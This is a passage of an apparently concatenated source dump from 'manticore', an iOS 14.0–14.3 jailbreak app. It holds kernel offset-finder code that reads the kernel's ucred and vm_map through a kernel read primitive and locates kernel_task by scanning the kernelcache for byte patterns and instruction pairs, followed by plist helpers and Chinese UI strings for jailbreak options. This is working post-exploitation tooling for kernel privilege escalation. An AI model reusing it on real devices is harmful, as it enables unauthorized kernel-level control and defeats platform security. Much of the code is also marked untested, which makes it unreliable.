170 | /** kernel_cred / kernel_vm_map finder **/
171 |
/* Resolve the kernel's ucred from its proc struct.
 *
 * Reads proc->p_ucred at OFFSET(proc, p_ucred) and returns it. Returns
 * KPTR_NULL, after a manticore_warn, when either the proc pointer or the
 * ucred pointer read from it fails KERN_POINTER_VALID. */
kptr_t get_kernel_cred_addr(kptr_t kernel_proc){
    if (!KERN_POINTER_VALID(kernel_proc)) {
        manticore_warn("Invalid kernel_proc_struct_addr.\t\t(0x%llx)\n", kernel_proc);
        return KPTR_NULL;
    }

    kptr_t ucred = kapi_read_kptr(kernel_proc + OFFSET(proc, p_ucred));
    if (!KERN_POINTER_VALID(ucred)) {
        manticore_warn("Invalid kernel_ucred_struct_addr.\t\t(0x%llx)\n", ucred);
        return KPTR_NULL;
    }

    return ucred;
}
183 |
/* Read the kernel task's vm_map pointer.
 *
 * The map is read from kernel_task + 0x28, a literal rather than an entry in
 * the offsets table — presumably task->map for the supported builds; verify
 * against the target kernel. The pointer is returned even when it fails
 * KERN_POINTER_VALID; that case only emits a warning naming the field address. */
kptr_t get_kernel_vm_map(kptr_t kernel_task){
    const kptr_t map_field = kernel_task + 0x28;
    kptr_t vm_map = kapi_read_kptr(map_field);
    if (KERN_POINTER_VALID(vm_map))
        return vm_map;
    manticore_warn("Pointer invalid; kernel_vm_map!\t\t(0x%llx)\n", map_field);
    return vm_map;
}
189 |
190 |
191 | /****** kernel_task finder ******/
192 |
// string to match
// A literal expected in the kernelcache (presumably the pretty-function string
// of IOGPUResource::newResourceWithOptions — confirm); find_kernel_task locates
// the function through the code that references it.
static const unsigned char *_IOGPUResource = (unsigned char *)"static IOGPUResource *IOGPUResource::newResourceWithOptions(IOGPU *, IOGPUDevice *, enum eIOGPUResType, uint64_t, IOByteCount, IOOptionBits, mach_vm_address_t *, IOGPUNewResourceArgs *)";
// address of ^ (0 until find_kernel_task has run; left 0 when its search fails)
kptr_t p_IOGPUResource = 0;

// Static (unslid) kernel base and a generous search length; init_offset_finder
// overwrites p_kernel_base with the address of the Mach-O header it finds.
// NOTE(review): on a live kernel the base is slid by KASLR, so KBASE is only a
// starting guess — confirm how callers obtain the real base before relying on it.
kptr_t p_kernel_base = KBASE;
size_t v_kernel_size = KSIZE; // this is almost guaranteed to go beyond end of kernel
200 |
201 |
202 |
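/* Locate the kernel_task global by walking from a known string to the code
 * that references it.
 *
 *   1. bmh_search for the IOGPUResource::newResourceWithOptions literal;
 *   2. find the ADRP/ADD that references it (find_xref_to);
 *   3. search a window around the xref for the expected function prologue;
 *   4. decode the ADRP+ADD pair at prologue+0xD0 / +0xD4, which is assumed to
 *      materialise &kernel_task (a fixed offset; see the file header:
 *      "untested").
 *
 * `kbase`/`ksize` default to p_kernel_base/v_kernel_size when 0.
 *
 * Returns the address of kernel_task, or 0 if any search fails or the words
 * at +0xD0/+0xD4 are not an ADRP followed by an ADD. The first version did
 * not check any of the intermediate results and would have read through a
 * NULL-derived pointer on the first miss.
 *
 * NOTE(review): bmh_search reads its haystack through the pointer directly, so
 * with TESTENV == 0 the kbase passed in must still be readable from this
 * process; only the two final instruction fetches go through _kread_32. */
kptr_t find_kernel_task(void *kbase, size_t ksize) {
  // p_kernel_base should be fine, but i'm not 100% sure
  if (!kbase) kbase = (void *)p_kernel_base;
  if (!ksize) ksize = v_kernel_size;

  static const unsigned char prologue_iogpuresource[] = {
      0xE6, 0x03, 0x05, 0xAA, /* MOV X6, X5 */
      0xE5, 0x03, 0x04, 0xAA, /* MOV X5, X4 */
      0xE4, 0x03, 0x03, 0xAA, /* MOV X4, X3 */
      0x03, 0x00, 0x80, 0xD2, /* MOV X3, #0 */
      0x07, 0x00, 0x80, 0xD2, /* MOV X7, #0 */
  };

  p_IOGPUResource = (kptr_t) bmh_search(
      _IOGPUResource, strlen((const char *)_IOGPUResource),
      (unsigned char *)kbase, ksize);
  if (p_IOGPUResource == 0) {
    /* Literal not present in the scanned range: nothing to xref. */
    return 0;
  }

#if TESTENV
  /* Rebase the in-process buffer address onto the kernel address space the
   * instruction stream encodes. */
  p_IOGPUResource -= (kptr_t) kbase;
  p_IOGPUResource += p_kernel_base;
#endif

  /* IOGPUResource::newResourceWithOptions */
  /* that same function has kernel_task at +D0 */
  kptr_t xref_iogpuresource = (kptr_t)find_xref_to((void *)p_IOGPUResource, kbase, 0, (void *)ksize);
  if (xref_iogpuresource == 0) {
    return 0;
  }

  /* backtrack to function prologue */
  /* The window starts 0xF0 before the xref; it must not start before kbase. */
  if (xref_iogpuresource < (kptr_t)kbase + 0xF0) {
    return 0;
  }
  kptr_t func_iogpuresource = (kptr_t) bmh_search(
      prologue_iogpuresource, sizeof(prologue_iogpuresource),
      (unsigned char *)(xref_iogpuresource - 0xF0), 0x500); /* 0x500 is way overshooting it as is */
  if (func_iogpuresource == 0) {
    return 0;
  }

  /* extract kernel_task from:
   * ADRP X8, #_kernel_task@PAGE
   * ADD X8, X8, #_kernel_task@PAGEOFF
   * Fetched through _kread_32, as find_xref_to does, rather than by
   * dereferencing the address directly. */
  aarch64_insn_t adrp_ktask = _kread_32((void *)(func_iogpuresource + 0xD0));
  aarch64_insn_t add_ktask = _kread_32((void *)(func_iogpuresource + 0xD4));
#if TESTENV
  printf("adrp_ktask: %p\nadd_ktask: %p\n", (void *)((size_t)adrp_ktask), (void *)((size_t)add_ktask));
#endif

  /* Refuse to decode anything other than the expected ADRP+ADD pair. */
  if (get_insn_type(adrp_ktask) != ADRP || get_insn_type(add_ktask) != ADD) {
    return 0;
  }

  /* Add (not OR) the page offset so a shifted imm12 is handled too. */
  kptr_t kernel_task = (kptr_t)_extract_adrp_imm(func_iogpuresource + 0xD0, adrp_ktask, 1) + _extract_add_imm(add_ktask);
  return kernel_task;
}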
245 |
/* Locate the kernel's Mach-O header and store its address in p_kernel_base.
 *
 * Scans v_kernel_size bytes from `kernel_base` for the 16-byte header prefix
 * (MH_MAGIC_64, CPU_TYPE_ARM64, a cpusubtype word, MH_EXECUTE) and overwrites
 * p_kernel_base with the match — or with 0 when bmh_search finds nothing,
 * since its NULL result is not checked here; callers should treat a zero
 * p_kernel_base as failure.
 *
 * NOTE(review): the cpusubtype word is selected at compile time from
 * __arm64e__, i.e. from how this binary was built, not from the device it
 * runs on. An arm64 build running on an arm64e device would search for the
 * wrong header. A runtime selector (is_pac() in util/arm.m reports the
 * exploit's PAC flag) would be safer — confirm which slices are shipped.
 *
 * NOTE(review): bmh_search dereferences `start` directly (not via _kread), so
 * with TESTENV == 0 `kernel_base` must be readable from this process. */
void init_offset_finder(kptr_t kernel_base) {
/* calculate kbase */
kptr_t start = kernel_base;
unsigned char macho_header[] = {
0xCF, 0xFA, 0xED, 0xFE, /* 0xFEEDFACF */
0x0C, 0x00, 0x00, 0x01, /* 0x0100000C */
#ifdef __arm64e__ /* switch on cpu subtype */
0x02, 0x00, 0x00, 0xc0, /* 0xC0000002 */
#else
0x00, 0x00, 0x00, 0x00, /* 0x00000000 */
#endif
0x02, 0x00, 0x00, 0x00 /* 0x00000002 */
};

/* NULL (no header found) is stored as-is, i.e. p_kernel_base becomes 0. */
p_kernel_base = (kptr_t) bmh_search(macho_header, sizeof(macho_header), (unsigned char *)start, v_kernel_size);
}
262 |
--------------------------------------------------------------------------------
/manticore/reton.xcdatamodeld/reton.xcdatamodel/contents:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/manticore/util/arm.m:
--------------------------------------------------------------------------------
1 | //
2 | // arm.m
3 | // manticore
4 | //
5 | // Created by 21 on 14.03.21.
6 | //
7 |
8 | #import
9 | #include "include/lib/tq/tq_common_p.h"
10 | #include "include/util/arm.h"
11 |
/* Whether the target has pointer authentication, as recorded in the exploit's
 * global state (g_exp.has_PAC); nothing is probed here. */
int is_pac() {
    const int has_pac = g_exp.has_PAC;
    return has_pac;
}
15 |
--------------------------------------------------------------------------------
/manticore/util/plistutils.mm:
--------------------------------------------------------------------------------
1 | //
2 | // plistutils.m
3 | // manticore
4 | //
5 | // Created by ??? on 7/3/21.
6 | //
7 |
8 | #import
9 |
/* modifyPlist: load a plist, hand its mutable root to `function`, and write it
 * back in the original format if the serialised bytes changed. */
/* Load the property list at `filename`, let `function` mutate its root object
 * in place, and write it back in the same serialisation format.
 *
 * Returns false if the file cannot be read, does not parse as a plist, cannot
 * be re-serialised, or the rewrite fails. The file is only rewritten when the
 * serialised bytes actually differ; the write uses writeToFile:atomically:YES.
 *
 * NOTE(review): an atomic write replaces the file rather than updating it in
 * place; when this is used on system plists, check that ownership and mode of
 * the replacement are what the consumer of that plist expects. */
bool modifyPlist(NSString *filename, void (^function)(id)) {
    NSData *original = [NSData dataWithContentsOfFile:filename];
    if (!original) {
        return false;
    }

    NSPropertyListFormat format;
    NSError *error = nil;
    id root = [NSPropertyListSerialization propertyListWithData:original
                                                        options:NSPropertyListMutableContainersAndLeaves
                                                         format:&format
                                                          error:&error];
    if (!root) {
        return false;
    }

    if (function) {
        function(root);
    }

    NSData *rewritten = [NSPropertyListSerialization dataWithPropertyList:root
                                                                   format:format
                                                                  options:0
                                                                    error:&error];
    if (!rewritten) {
        return false;
    }

    /* Nothing changed: report success without touching the file. */
    if ([original isEqual:rewritten]) {
        return true;
    }
    return [rewritten writeToFile:filename atomically:YES] ? true : false;
}
25 |
/* Create a minimal plist at `filename`.
 *
 * Despite the name the file is not empty: it holds a single placeholder entry
 * "test" = "test" (presumably to avoid writing an empty dictionary — callers
 * should not rely on that key). Returns whether the atomic write succeeded. */
bool createEmptyPlist(NSString *filename) {
    NSDictionary *placeholder = @{ @"test": @"test" };
    return [placeholder writeToFile:filename atomically:YES];
}
31 |
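/* Read the plist at `filename` and return its root object as a dictionary.
 *
 * Returns nil if `filename` is nil, the file cannot be read, it does not parse
 * as a plist, or its root object is not a dictionary (an array plist, say).
 *
 * Fixes relative to the first version: `error` was declared without an
 * initialiser and tested after the calls, but the out-error is only assigned
 * on failure, so on the success path the check read an indeterminate pointer;
 * a nil `data` was also passed straight into the parser. The result is now
 * type-checked so the declared return type is honoured. */
NSDictionary *readPlist(NSString *filename) {
    if (!filename) {
        return nil;
    }

    NSURL *url = [NSURL fileURLWithPath:filename];
    NSError *error = nil;
    NSData *data = [NSData dataWithContentsOfURL:url options:0 error:&error];
    if (!data) {
        return nil;
    }

    id root = [NSPropertyListSerialization propertyListWithData:data options:0 format:nil error:&error];
    if (![root isKindOfClass:[NSDictionary class]]) {
        /* Either parsing failed (root == nil) or the root is not a dictionary. */
        return nil;
    }
    return (NSDictionary *)root;
}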
41 |
--------------------------------------------------------------------------------
/manticore/util/util.mm:
--------------------------------------------------------------------------------
1 | //
2 | // util.m
3 | // manticore
4 | //
5 | // Created by admin on 7/3/21.
6 | //
7 |
8 | #import
9 |
/* The app's CFBundleVersion as read from the main bundle's Info.plist; nil if
 * the key is absent (e.g. when not running inside an app bundle). */
NSString *programVersion() {
    NSBundle *bundle = [NSBundle mainBundle];
    id version = [bundle objectForInfoDictionaryKey:@"CFBundleVersion"];
    return version;
}
13 |
--------------------------------------------------------------------------------
/manticore/zh-Hant.lproj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/zh-Hant.lproj/Main.strings:
--------------------------------------------------------------------------------
1 |
2 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "0il-tf-sNa"; */
3 | "0il-tf-sNa.text" = "Manticore";
4 |
5 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
6 | "0yi-4F-L8u.text" = "設定APNonce";
7 |
8 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
9 | "2Nf-dY-FJy.text" = "啟用插件";
10 |
11 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "6hM-Fc-FDp"; */
12 | "6hM-Fc-FDp.normalTitle" = "Jailbreak";
13 |
14 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
15 | "AVZ-qX-0ms.text" = "回復RootFS";
16 |
17 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
18 | "B09-wX-UeI.normalTitle" = "Jailbreak";
19 |
20 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
21 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
22 |
23 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "Kda-OK-gFg"; */
24 | "Kda-OK-gFg.text" = "iOS 14.0 - 14.3";
25 |
26 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
27 | "WEh-zy-xS5.normalTitle" = "設定並保存APNonce";
28 |
29 | /* Class = "UIButton"; normalTitle = "Options Button"; ObjectID = "czz-vo-cHF"; */
30 | "czz-vo-cHF.normalTitle" = "選項";
31 |
32 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
33 | "efL-nQ-xsh.text" = "禁用OTA更新";
34 |
35 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
36 | "i1H-yX-3n8.text" = "兼容性";
37 |
38 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
39 | "kyq-MK-M3C.text" = "移除螢幕使用時間";
40 |
41 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
42 | "mUJ-nK-XHv.text" = "Manticore";
43 |
44 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
45 | "o5h-H3-igh.text" = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!";
46 |
47 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
48 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
49 |
50 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
51 | "voS-Ev-D3K.text" = "記錄ECID";
52 |
53 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
54 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
55 |
56 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
57 | "yiE-wg-tPU.text" = "開啟記錄視窗";
58 |
59 | /* Class = "UILabel"; text = "Settings"; ObjectID = "KVP-vA-4W2"; */
60 | "KVP-vA-4W2.text" = "設定";
61 |
62 | /* Class = "UILabel"; text = "Package Management"; ObjectID = "8lS-uL-LxK"; */
63 | "8lS-uL-LxK.text" = "套件管理器";
64 |
65 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "bFz-pN-VmJ"; */
66 | "bFz-pN-VmJ.text" = "回復RootFS";
67 |
68 | /* Class = "UILabel"; text = "Disable Updates"; ObjectID = "K4g-i5-DXs"; */
69 | "K4g-i5-DXs.text" = "禁用(OTA)更新";
70 |
71 | /* Class = "UILabel"; text = "Max Memory Limit"; ObjectID = "hav-yD-P83"; */
72 | "hav-yD-P83.text" = "最大記憶體限制";
73 |
74 | /* Class = "UILabel"; text = "Load Tweaks"; ObjectID = "ntj-8w-lbe"; */
75 | "ntj-8w-lbe.text" = "加載插件";
76 |
77 | /* Class = "UILabel"; text = "Load Daemons"; ObjectID = "kFD-2g-aOl"; */
78 | "kFD-2g-aOl.text" = "加載守護程式";
79 |
80 | /* Class = "UILabel"; text = "Show Log Window"; ObjectID = "GyA-VR-ZRI"; */
81 | "GyA-VR-ZRI.text" = "顯示記錄視窗";
82 |
83 | /* Class = "UILabel"; text = "Disable Screen Time"; ObjectID = "8Oy-13-2xy"; */
84 | "8Oy-13-2xy.text" = "禁用螢幕使用時間";
85 |
--------------------------------------------------------------------------------